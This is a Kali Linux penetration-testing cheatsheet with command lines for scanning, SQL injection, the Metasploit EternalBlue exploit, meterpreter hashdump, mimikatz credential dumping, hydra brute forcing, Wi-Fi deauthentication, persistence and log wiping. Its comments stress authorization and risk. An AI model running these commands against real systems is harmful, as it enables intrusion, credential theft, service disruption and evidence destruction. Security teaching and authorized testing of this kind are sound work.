Kali Linux Cheatsheet
Kali Linux is a Debian-based, rolling-release Linux distribution specifically designed for digital forensics and penetration testing. Developed and maintained by OffSec (formerly Offensive Security), Kali Linux ships with several hundred pre-packaged security tools, making it a standard platform for cybersecurity professionals, ethical hackers, and security researchers worldwide. Every active technique on this page (scanning, brute forcing, exploitation, wireless attacks) is only lawful against systems you own or have explicit written authorization to test.
Installation and Setup
Download and Installation
bash
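# Download Kali Linux ISO (release pinned to 2024.1 here; adjust the path for
# the release you actually want)
wget https://cdimage.kali.org/kali-2024.1/kali-linux-2024.1-installer-amd64.iso
# Verify checksum AGAINST THE SIGNED LIST. Running sha256sum on the ISO alone
# proves nothing — a tampered mirror serves a matching tampered hash. Fetch
# SHA256SUMS and its detached GPG signature from the same release directory.
wget https://cdimage.kali.org/kali-2024.1/SHA256SUMS
wget https://cdimage.kali.org/kali-2024.1/SHA256SUMS.gpg
# Import the Kali archive signing key, then compare its fingerprint with the
# one published in the Kali documentation (kali.org/docs) before trusting it.
wget -q -O - https://archive.kali.org/archive-key.asc | gpg --import
gpg --verify SHA256SUMS.gpg SHA256SUMS
# Only once the signature verifies, check the ISO against the list
# (--ignore-missing skips the other images listed in SHA256SUMS).
sha256sum -c --ignore-missing SHA256SUMS
# Create bootable USB (Linux). dd overwrites the target device with no
# confirmation — list the disks and confirm /dev/sdX is the USB stick
# (size/model) immediately before running it. conv=fsync flushes the write
# so the stick is safe to remove when dd returns.
lsblk -o NAME,SIZE,MODEL,TRAN
sudo dd if=kali-linux-2024.1-installer-amd64.iso of=/dev/sdX bs=4M status=progress conv=fsync
# Create bootable USB (Windows - use Rufus or similar tool)
# Use Rufus, Etcher, or Win32DiskImager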
Virtual Machine Setup
bash
# VMware recommended settings
# RAM: 4GB minimum, 8GB recommended
# Storage: 80GB minimum
# Network: NAT for internet access; Bridged puts the Kali VM (and every service you start on it) directly on the host's LAN — use Host-only/Internal networking for vulnerable lab targets so they are never reachable from outside
# VirtualBox recommended settings
# RAM: 4GB minimum, 8GB recommended
# Storage: 80GB minimum, VDI format
# Network: NAT or Bridged (same caveat as above: Bridged exposes the VM to the LAN; prefer Host-only/Internal for lab targets)
# Enable VT-x/AMD-V virtualization in the BIOS/UEFI (and turn off Hyper-V/WSL2 on Windows hosts if VirtualBox runs slowly)
Initial Configuration
bash
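# Update system. Kali is a rolling release: `full-upgrade` also applies
# upgrades that require package removals, which plain `upgrade` holds back
# and leaves the system half-updated (this is what the Kali docs recommend).
sudo apt update && sudo apt full-upgrade -y
# Install additional tools (large metapackage, several GB of downloads)
sudo apt install -y kali-linux-large
# Configure non-root user (recommended: daily work and tool installs should
# not run as root; use sudo for the few commands that need it)
sudo useradd -m -s /bin/bash username
sudo usermod -aG sudo username
sudo passwd username
# Configure firewall BEFORE exposing services. ufw is not installed by
# default on Kali; set the policy and allow rules first, enable last.
# Enabling "default deny incoming" on a box where sshd already listens and
# no allow rule exists drops every remote session, including the one you
# may be typing in.
sudo apt install -y ufw
sudo ufw default deny incoming
sudo ufw default allow outgoing
# Enable SSH (if needed) and allow it through the firewall at the same
# time. Restrict the rule to the network you administer from where
# possible (`sudo ufw allow from <admin-net> to any port 22 proto tcp`),
# and prefer key-based auth (PasswordAuthentication no in sshd_config).
sudo ufw allow 22/tcp
sudo systemctl enable ssh
sudo systemctl start ssh
sudo ufw enable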
Essential Tools and Commands
Information Gathering
bash
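# Nmap - Network scanning
# -sS (SYN scan) and -O (OS fingerprinting) use raw sockets: as a normal
# user nmap aborts with "requires root privileges", so run it via sudo.
sudo nmap -sS -sV -O target_ip
# -sC default NSE scripts + -sV version detection; -oA writes .nmap/.gnmap/
# .xml — keep the XML, it is what most reporting tools import
nmap -sC -sV -oA scan_results target_ip
# The NSE "vuln" category includes intrusive checks that can disturb
# fragile services; run it only inside the agreed scope and test window
nmap --script vuln target_ip
# Masscan - Fast port scanner (raw sockets: needs root). --rate is packets
# per second; 1000 is modest but still enough to trip IDS or overwhelm small
# embedded devices — agree rate limits with the client beforehand
sudo masscan -p1-65535 target_ip --rate=1000
# Dmitry - Information gathering
# -w whois (domain), -i whois (IP), -n netcraft, -s subdomains, -e emails,
# -p port scan (ACTIVE — drop it for passive-only recon), -o output file
dmitry -winsepo output.txt target.com
# theHarvester - Email and subdomain gathering (passive; -l caps results;
# the google source is frequently rate-limited/CAPTCHAed)
theHarvester -d target.com -l 500 -b google
# Recon-ng - Web reconnaissance framework (interactive shell; modules
# that use third-party APIs need keys added with `keys add`)
recon-ng
[recon-ng][default] > workspaces create target_workspace
[recon-ng][target_workspace] > modules load recon/domains-hosts/google_site_web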
Vulnerability Assessment
bash
# OpenVAS - Vulnerability scanner
# gvm-setup is a one-time install; it prints a generated admin password at
# the end — record it, then change it in the web UI (https://127.0.0.1:9392)
sudo gvm-setup
sudo gvm-start
# feed sync takes a long time on first run; scans are unreliable until it finishes
sudo gvm-feed-update
# Nikto - Web vulnerability scanner (very noisy: thousands of requests,
# trivially detected by WAF/IDS — use only inside agreed scope and windows)
nikto -h http://target.com
nikto -h http://target.com -o nikto_results.txt
# Dirb - Directory brute forcer (default list is common.txt; second form
# uses the larger big.txt)
dirb http://target.com
dirb http://target.com /usr/share/dirb/wordlists/big.txt
# Gobuster - Directory/file brute forcer. The medium list is roughly 220k
# entries; cap threads with -t on fragile hosts and add -x for extensions
gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# DNS subdomain brute force — generates many queries against the zone's resolvers
gobuster dns -d target.com -w /usr/share/wordlists/dnsmap.txt
# WPScan - WordPress vulnerability scanner
# --enumerate u,p,t = users, plugins, themes (add an API token from
# wpvulndb/wpscan.com for vulnerability data)
wpscan --url http://target.com --enumerate u,p,t
# ONLINE password attack against the live login (tries the list against the
# enumerated users): can lock accounts and trigger alerting — confirm it is
# permitted by the rules of engagement first
wpscan --url http://target.com --passwords /usr/share/wordlists/rockyou.txt
Web Application Testing
bash
# Burp Suite - Web application security testing (proxy listens on
# 127.0.0.1:8080 by default; point the browser at it and install Burp's CA
# certificate to intercept HTTPS)
burpsuite &
# OWASP ZAP - Web application scanner
zaproxy &
# SQLmap - SQL injection testing
# --dbs only enumerates database names
sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables
# --dump pulls real row contents (often PII or credentials) into sqlmap's
# local output directory. Only do this if data extraction is in scope, and
# store/destroy the output per the engagement's data-handling rules.
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump
# Commix - Command injection testing (its payloads execute on the target if
# the parameter is vulnerable — keep them non-destructive)
commix --url="http://target.com/page.php?id=1"
# XSSer - Cross-site scripting testing (XSS marks where payloads are injected)
xsser --url "http://target.com/search.php?q=XSS" --auto
Exploitation
bash
# Metasploit Framework (run `sudo msfdb init` once so the database-backed
# features work; `msfconsole -q` skips the banner)
msfconsole
msf6 > search type:exploit platform:windows
# MS17-010 / EternalBlue is a kernel pool-corruption exploit: a failed
# attempt can blue-screen the target. Confirm vulnerability first with
# auxiliary/scanner/smb/smb_ms17_010 and get the client's OK for crash risk.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS target_ip
# set LHOST to the interface the target can reach back before `exploit`
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
# Searchsploit - Exploit database search
searchsploit apache 2.4
# -m copies the exploit into the current directory (12345 is a placeholder
# EDB-ID). Read public exploit code before running it: it is untrusted
# code and has on occasion been backdoored.
searchsploit -m 12345.py
# Social Engineering Toolkit
setoolkit
# Select from menu options for phishing, credential harvesting, etc.
# Phishing real staff requires explicit written authorization and a plan
# for handling any captured credentials.
# BeEF - Browser exploitation framework
beef-xss
# Access web interface at http://127.0.0.1:3000/ui/panel
# Make sure the panel password is not the historical default (beef:beef) —
# Kali's config lives under /etc/beef-xss/ — and never expose port 3000
# beyond the interface the hooked browsers need.
Post-Exploitation
bash
# Meterpreter commands (within Metasploit session)
meterpreter > sysinfo
meterpreter > getuid
meterpreter > ps
# migrate into a stable process at the same or higher privilege (e.g.
# explorer.exe for a user, a service for SYSTEM); migrating into a
# short-lived process drops the session
meterpreter > migrate PID
# hashdump needs SYSTEM. The hashes are the client's credentials: store
# them encrypted, report them, and destroy them per the engagement's rules.
meterpreter > hashdump
meterpreter > screenshot
meterpreter > download C:\\file.txt /tmp/
# every file you upload is an artefact you must track and remove at the end
meterpreter > upload /tmp/file.txt C:\\
# Empire - PowerShell post-exploitation (server first, then the client;
# defaults to localhost — change the admin credentials in the config)
powershell-empire server
powershell-empire client
# Mimikatz - Credential extraction
# Runs ON THE WINDOWS TARGET, not on Kali (or via meterpreter's kiwi
# extension: `load kiwi`). Kali only ships the binaries, typically under
# /usr/share/windows-resources/mimikatz/, for you to transfer over.
# privilege::debug needs local admin; sekurlsa reads LSASS memory and is
# a high-confidence EDR trigger.
mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam
Password Attacks
bash
# John the Ripper - Password cracking (OFFLINE: no interaction with the target).
# rockyou ships compressed on Kali — `sudo gunzip /usr/share/wordlists/rockyou.txt.gz` once.
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# print cracked results from john's pot file
john --show hashes.txt
# Hashcat - Advanced password recovery
# -m 1000 = NTLM: pick the mode matching your hash type (hashcat --help);
# -a 0 = straight wordlist attack
hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
# -a 3 = mask attack; ?a = any printable ASCII, so this is every 8-char
# printable password (~6.6e15 candidates — only feasible for fast hashes on GPU)
hashcat -m 1000 -a 3 hashes.txt ?a?a?a?a?a?a?a?a
# Hydra - Network login cracker. ONLINE attacks: every guess is a failed
# login on the live target, which can lock accounts out and fire alerts.
# Get the lockout policy and explicit permission first; throttle with
# -t (tasks) and -W (wait between attempts).
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target_ip
hydra -L users.txt -P passwords.txt ftp://target_ip
# http-post-form syntax: "path:POST body with ^USER^/^PASS^:failure string" —
# the failure string must appear in the response for a WRONG password
hydra -l admin -P /usr/share/wordlists/rockyou.txt target_ip http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid"
# Medusa - Parallel login brute forcer (same lockout caveat as hydra)
medusa -h target_ip -u admin -P /usr/share/wordlists/rockyou.txt -M ssh
medusa -H hosts.txt -U users.txt -P passwords.txt -M ftp
# Crunch - Wordlist generator
# -t pattern placeholders: , = uppercase letter, @ = lowercase, % = digit, ^ = symbol
crunch 8 8 -t ,@@@@@@@ -o wordlist.txt
# 36-char set at lengths 6-10 is ~3.7e15 candidates — far too large to write
# to disk; pipe long ranges straight into the cracker (crunch ... | hashcat ...)
crunch 6 10 abcdefghijklmnopqrstuvwxyz0123456789 -o custom_wordlist.txt
Wireless Security
bash
# Aircrack-ng suite - WiFi security testing
# Everything below transmits or interferes on shared radio spectrum: only
# against networks you own or have written authorization for. Knocking
# other people's clients offline is illegal in most jurisdictions even in
# the middle of an otherwise legitimate engagement.
# Monitor mode (run `airmon-ng check kill` first if NetworkManager keeps
# resetting the card; the interface is renamed wlan0mon)
airmon-ng start wlan0
# Capture packets (survey mode — nothing is written without -w)
airodump-ng wlan0mon
# Capture specific network: lock to channel 6 and one BSSID, write capture-NN.cap
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Deauth attack: forges 10 deauthentication frames to all clients of the AP
# so they reconnect and the 4-way handshake can be captured. This is a
# denial of service for real users — keep the count small and the scope
# tight. Ineffective against 802.11w (protected management frames) / WPA3.
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Crack WPA/WPA2 — offline, from the handshake in the capture file
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# Reaver - WPS attack (online PIN brute force; many APs lock WPS after a
# few failures, so it can take hours or never finish; -vv = verbose)
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
# Wifite - Automated wireless attack. Unfiltered, it attacks EVERY network
# in range — always restrict it to the in-scope AP (-e ESSID or -b BSSID)
wifite --wpa --dict /usr/share/wordlists/rockyou.txt
Digital Forensics
bash
# Autopsy - Digital forensics platform
autopsy &
# Volatility - Memory analysis
# These are Volatility 2 invocations (--profile=...). Current Kali packages
# Volatility 3, where the tool is `vol` and profiles are detected
# automatically: `vol -f memory.dump windows.info`, `windows.pslist`,
# `windows.netscan`, `windows.malfind`.
volatility -f memory.dump imageinfo
volatility -f memory.dump --profile=Win7SP1x64 pslist
volatility -f memory.dump --profile=Win7SP1x64 netscan
# malfind lists injected/suspicious executable regions; expect false positives
volatility -f memory.dump --profile=Win7SP1x64 malfind
# Binwalk - Firmware analysis (signature scan only)
binwalk firmware.bin
# -e runs third-party extractors (unsquashfs, 7z, ...) on attacker-controlled
# input: do this in a throwaway VM/container, not on your daily host
binwalk -e firmware.bin
# Foremost - File carving
# Evidence handling: work on a read-only copy of the image, and record
# sha256sum of the original before and after analysis (chain of custody)
foremost -i disk_image.dd -o recovered_files/
# Sleuth Kit - File system analysis
# -r recursive listing; if the image contains a partition table rather than
# a bare filesystem, add -o <sector offset> (find it with mmls)
fls -r disk_image.dd
# inode_number is taken from the fls output
icat disk_image.dd inode_number > recovered_file
Reverse Engineering
bash
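# Ghidra - NSA reverse engineering tool (static analysis; does not execute the binary)
ghidra &
# Radare2 - Reverse engineering framework
r2 binary_file
# aaa = analyse all; pdf @main = print disassembly of main
[0x00000000]> aaa
[0x00000000]> pdf @main
# GDB - GNU Debugger
# Set the breakpoint BEFORE `run`: in the original order (run, then break)
# the program executes to completion before the breakpoint exists.
# gdb EXECUTES the binary — debug unknown/malicious samples only inside an
# isolated VM or sandbox with no network.
gdb binary_file
(gdb) break main
(gdb) run
(gdb) info registers
(gdb) continue
# Strings - Extract strings from binaries
strings binary_file
# -n 10: minimum length 10 reduces noise; grepping for secrets is a quick
# triage, not a substitute for reading the code
strings -n 10 binary_file | grep -i password
# Hexdump - Hex viewer (-C canonical hex+ASCII; xxd is the vim-bundled equivalent)
hexdump -C binary_file | head -20
xxd binary_file | head -20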
System Administration
Package Management
bash
# Update package lists
sudo apt update
# Upgrade all packages
# Kali is rolling: the Kali docs recommend `apt full-upgrade`, because plain
# `upgrade` holds back any package whose upgrade needs removals and can
# leave the system partially updated
sudo apt upgrade -y
# Install specific tools
sudo apt install -y tool_name
# Install Kali metapackages (large/everything pull many GB; see
# https://www.kali.org/tools/kali-meta/ for what each one contains)
sudo apt install -y kali-linux-large
sudo apt install -y kali-linux-everything
sudo apt install -y kali-tools-top10
# Search for packages
apt search keyword
apt show package_name
# Remove packages
sudo apt remove package_name
# purge also deletes the package's configuration files under /etc
sudo apt purge package_name
# drop dependencies no longer needed by any installed package
sudo apt autoremove
Service Management
bash
# Systemctl commands
sudo systemctl start service_name
sudo systemctl stop service_name
sudo systemctl restart service_name
# enable/disable only affect boot; add --now to also start/stop immediately
sudo systemctl enable service_name
sudo systemctl disable service_name
sudo systemctl status service_name
# Common services. ssh and apache2 listen on all interfaces by default: on a
# test box sitting on a client network that is new attack surface — bind to
# localhost or firewall them, and stop them when you are done.
sudo systemctl start ssh
sudo systemctl start apache2
sudo systemctl start postgresql
sudo systemctl start mysql
# Check listening ports (netstat is deprecated, ss is its replacement; run
# with sudo or the -p process column is empty for other users' sockets)
netstat -tlnp
ss -tlnp
Network Configuration
bash
# Interface configuration
ip addr show
ip link set eth0 up
ip link set eth0 down
# Static IP configuration
# Kali manages interfaces with NetworkManager. An interface declared in
# /etc/network/interfaces is left alone by NM (and vice versa), so pick ONE
# mechanism. The NM equivalent is:
#   nmcli con mod <connection> ipv4.method manual \
#     ipv4.addresses 192.168.1.100/24 ipv4.gateway 192.168.1.1
sudo nano /etc/network/interfaces
# Add:
# auto eth0
# iface eth0 inet static
# address 192.168.1.100
# netmask 255.255.255.0
# gateway 192.168.1.1
# DNS configuration
# /etc/resolv.conf is rewritten by NetworkManager/DHCP on every reconnect,
# so manual edits do not persist — set DNS on the connection instead
# (nmcli con mod <connection> ipv4.dns "..."). Also: using public resolvers
# from inside a client network sends every name you look up to a third
# party; prefer the engagement's or the VPN's resolver.
sudo nano /etc/resolv.conf
# Add:
# nameserver 8.8.8.8
# nameserver 8.8.4.4
# Restart networking (only re-reads /etc/network/interfaces; NM-managed
# interfaces need `sudo systemctl restart NetworkManager`)
sudo systemctl restart networking
User Management
bash
# Add user (-m creates the home directory, -s sets the login shell)
sudo useradd -m -s /bin/bash username
sudo passwd username
# Add user to groups (-a appends; without it, -G REPLACES the user's
# supplementary groups). sudo = full root via sudo; adm = read access to /var/log
sudo usermod -aG sudo username
sudo usermod -aG adm username
# Switch user
su - username
sudo -u username command
# View user information (finger may not be installed; `getent passwd username`
# shows the same account data from any NSS source)
id username
groups username
finger username
# Lock/unlock user. -L only disables the password: SSH public-key logins
# still work. To block all logins also set `usermod --expiredate 1 username`
# or a nologin shell.
sudo usermod -L username
sudo usermod -U username
Advanced Techniques
Custom Tool Installation
bash
# Install from source — supply-chain hygiene: `sudo make install` runs the
# repository's build scripts as root. Clone only from the project's
# canonical URL, check out a tagged release, verify it when the project
# signs tags (`git verify-tag <tag>`), and read the Makefile's install
# target before running it.
git clone https://github.com/tool/repository.git
cd repository
make && sudo make install
# Python tools — current Kali enforces PEP 668, so a system-wide pip install
# fails with "externally-managed-environment". Use `pipx install tool_name`
# or a venv (python3 -m venv venv && . venv/bin/activate) rather than
# --break-system-packages. Pin versions (and ideally --hash) in requirements.txt.
pip3 install tool_name
pip3 install -r requirements.txt
# Go tools (@latest is a floating reference; pin a tagged version for
# reproducible builds — module checksums are verified against sum.golang.org)
go install github.com/tool/repository@latest
# Ruby gems (as a user, not root; consider `gem install --user-install`)
gem install tool_name
# Manual installation — a tarball over HTTPS is only as trustworthy as the
# site; verify it against a published checksum or signature before
# ./configure, and inspect `make install` destinations first (make -n install)
wget https://example.com/tool.tar.gz
tar -xzf tool.tar.gz
cd tool
./configure && make && sudo make install
Environment Customization
bash
# Bash aliases
nano ~/.bashrc
# Add useful aliases:
alias ll='ls -la'
alias la='ls -A'
alias l='ls -CF'
alias ..='cd ..'
alias ...='cd ../..'
alias grep='grep --color=auto'
# Speed-over-accuracy defaults: --max-retries 1, --max-scan-delay 20 and
# --defeat-rst-ratelimit cause ports to be missed or reported as filtered on
# lossy or rate-limited links, and --open hides closed/filtered detail.
# Because this shadows the nmap command itself, bypass it with `\nmap` or
# `command nmap` whenever a careful, complete scan is required.
alias nmap='nmap --reason --open --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit'
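# Custom functions
# extract FILE — unpack an archive into the current directory, dispatching
# on the file extension. Prints a message (to stdout) for an unknown
# extension or a missing file; the extractor's own exit status is returned.
# Quoting "$1" is the fix: the unquoted original word-split file names with
# spaces or glob characters, so `[ -f $1 ]` failed and a perfectly good
# archive was reported as "not a valid file".
# Archives are untrusted input: entries may carry absolute or ../ paths
# (GNU tar strips them by default, unzip warns) — unpack unknown archives
# in an empty scratch directory, never in $HOME.
function extract() {
  if [ -f "$1" ] ; then
    case "$1" in
      *.tar.bz2) tar xjf "$1" ;;
      *.tar.gz) tar xzf "$1" ;;
      *.bz2) bunzip2 "$1" ;;
      *.rar) unrar e "$1" ;;
      *.gz) gunzip "$1" ;;
      *.tar) tar xf "$1" ;;
      *.tbz2) tar xjf "$1" ;;
      *.tgz) tar xzf "$1" ;;
      *.zip) unzip "$1" ;;
      *.Z) uncompress "$1" ;;
      *.7z) 7z x "$1" ;;
      *) echo "'$1' cannot be extracted via extract()" ;;
    esac
  else
    echo "'$1' is not a valid file"
  fi
}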
# Source the changes
source ~/.bashrc
Automation Scripts
bash
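#!/bin/bash
# Basic reconnaissance script: nmap, directory brute force and nikto against
# one host, with output under results/<target>/.
# Usage: sudo ./recon.sh <target>
#  - The target is used as a directory name, so it is restricted to
#    hostname/IP characters: the original `mkdir -p results/$TARGET` would
#    happily write to results/../../somewhere for a crafted argument.
#  - Every expansion is quoted; -sS/-O need raw sockets, hence sudo (or
#    replace them with -sT).
#  - All three steps are active scans of the target: stay inside the
#    written scope and agreed test window.
set -u
TARGET=${1:-}
if [ -z "$TARGET" ]; then
  echo "Usage: $0 <target>"
  exit 1
fi
# reject anything that is not a plain hostname/IP, including leading '-'
# (would be parsed as an option by the tools) and leading '.'
case "$TARGET" in
  *[!A-Za-z0-9._-]*|-*|.*)
    echo "Invalid target '$TARGET': use a hostname or IP address" >&2
    exit 1
    ;;
esac
OUT="results/$TARGET"
echo "Starting reconnaissance on $TARGET"
mkdir -p -- "$OUT" || exit 1
# Nmap scan (failure is reported but does not stop the web checks)
echo "Running Nmap scan..."
nmap -sS -sV -sC -O -oA "$OUT/nmap_scan" "$TARGET" || echo "nmap failed (root needed for -sS/-O?)" >&2
# Directory enumeration — only meaningful if the target serves HTTP; gobuster
# exits non-zero when it cannot connect, which is not fatal here
echo "Running directory enumeration..."
gobuster dir -u "http://$TARGET" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o "$OUT/gobuster.txt" || echo "gobuster failed" >&2
# Nikto scan
echo "Running Nikto scan..."
nikto -h "http://$TARGET" -o "$OUT/nikto.txt" || echo "nikto failed" >&2
echo "Reconnaissance complete. Results saved in $OUT/"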
Persistence and Stealth
bash
# These are post-exploitation actions executed on a COMPROMISED TARGET, not
# on your Kali box. Each must be explicitly within the written scope, and
# every artefact (keys, cron entries, unit files, binaries) must be logged
# and removed at the end of the engagement.
# SSH key persistence (use a key name that identifies the engagement so it
# can be found and removed; ed25519 is the current default: ssh-keygen -t ed25519)
ssh-keygen -t rsa -b 4096
ssh-copy-id user@target_ip
# Cron job persistence (the entry is visible in crontab -l / /var/spool/cron)
crontab -e
# Add: @reboot /path/to/script.sh
# Service persistence
sudo nano /etc/systemd/system/custom.service
# Create service file for persistence
# Log cleaning — WARNING: truncating logs and wiping shell history on a
# client system is evidence destruction. It is almost never in scope, it
# blinds the client's defenders (whose detection may be what is being
# evaluated) and it can be an offence even under an otherwise valid
# authorization. Do not run these without explicit written permission; if
# the goal is to test detection, leave the evidence and report it.
sudo truncate -s 0 /var/log/auth.log
sudo truncate -s 0 /var/log/syslog
history -c && history -w
# "Process hiding" is a misnomer: nohup + disown only detach the job from
# the terminal so it survives logout. The process remains fully visible in
# ps/top//proc and to any EDR — nothing here hides anything.
nohup ./malicious_binary > /dev/null 2>&1 &
disown
Troubleshooting
Common Issues
bash
# WiFi adapter not working
# `check kill` stops NetworkManager/wpa_supplicant — that drops ALL your
# network connections, so restart NetworkManager when you are done.
# ifconfig/iwconfig are deprecated; the iproute2/iw equivalents are
# `ip link set wlan0 down`, `iw dev wlan0 set type monitor`, `ip link set wlan0 up`.
sudo airmon-ng check kill
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
# VirtualBox guest additions (VBoxClient normally runs inside the user's
# desktop session; under sudo it may not attach to your display — try it
# without sudo first, or just log out and back in after installing)
sudo apt install -y virtualbox-guest-x11
sudo VBoxClient --clipboard
sudo VBoxClient --draganddrop
# Graphics issues (reinstalls the default Xfce desktop and re-selects the display manager)
sudo apt install -y kali-desktop-xfce
sudo dpkg-reconfigure lightdm
# Sound issues (recent Kali releases ship PipeWire; installing pulseaudio
# alongside it can conflict — check `systemctl --user status pipewire` first)
sudo apt install -y pulseaudio
pulseaudio --start
# Network issues (dhclient on an NM-managed interface fights with NM;
# prefer `nmcli con up <connection>` or the NetworkManager restart below)
sudo dhclient eth0
sudo systemctl restart networking
sudo systemctl restart NetworkManager
Performance Optimization
bash
# Disable unnecessary services (also trims attack surface: avahi advertises
# the host on the LAN via mDNS and cups listens on 631). `disable` only
# affects boot — add --now, or `stop`, to end the running instance as well.
sudo systemctl disable bluetooth
sudo systemctl disable cups
sudo systemctl disable avahi-daemon
# Clean system (autoclean removes only obsolete .deb files, clean removes all)
sudo apt autoremove
sudo apt autoclean
sudo apt clean
# Monitor resources (iotop/nethogs/iftop need root for complete output)
htop
iotop
nethogs
iftop
# Optimize for VMs — install only the guest tools matching your hypervisor
sudo apt install -y open-vm-tools
sudo apt install -y virtualbox-guest-utils
Security Best Practices
Operational Security
bash
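# Use VPN for testing (lab/engagement VPN). Confirm with `ip route` that the
# target range is routed via the tunnel before scanning, so test traffic
# does not leave through your default interface.
sudo openvpn config.ovpn
# Proxy chains configuration (enable proxy_dns in the config, or every
# name lookup leaks to your local resolver)
sudo nano /etc/proxychains.conf
# proxychains only intercepts TCP connect() calls. Raw-socket scans (-sS, -O,
# UDP, ICMP host discovery) bypass the proxy entirely and reach the target
# from your real address — the original `proxychains nmap target_ip`
# defaults to -sS as root and leaks. Use a TCP connect scan and skip ping.
proxychains nmap -sT -Pn target_ip
# Tor usage (slow; exit nodes see plaintext traffic; many targets block
# Tor exits — a Tor-sourced scan is also conspicuous in the target's logs)
sudo systemctl start tor
proxychains firefox
# MAC address randomization. The interface normally has to be down to change
# the MAC, and this only changes the L2 address: DHCP hostname, probe
# requests and driver quirks still fingerprint the machine.
sudo ip link set wlan0 down
sudo macchanger -r wlan0
sudo macchanger -m 00:11:22:33:44:55 wlan0
sudo ip link set wlan0 up
# Secure deletion — overwriting is NOT reliable on SSDs/flash or on
# journaling and copy-on-write filesystems (see the caveat in shred(1)):
# blocks are remapped and old copies survive. Rely on full-disk encryption
# and destroy the key instead; shred is a best-effort extra.
shred -vfz -n 3 sensitive_file
wipe -rf directory/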
Legal and Ethical Considerations
bash
# Always obtain proper authorization
# Document scope and limitations
# Follow responsible disclosure
# Maintain confidentiality
# Respect privacy and data protection laws
# Create engagement documentation
# NOTE: a text file you write yourself is NOT an authorization. The real
# artefact is a signed agreement (rules of engagement / statement of work)
# from someone entitled to grant access to the systems in scope, kept
# out-of-band. The lines below are only a local reminder of what it must
# contain — add the signatory, the exact testing window, excluded systems
# and an emergency contact.
echo "Penetration Test Authorization" > authorization.txt
echo "Client: Company Name" >> authorization.txt
echo "Scope: IP ranges, domains" >> authorization.txt
echo "Date: $(date)" >> authorization.txt
echo "Tester: Your Name" >> authorization.txt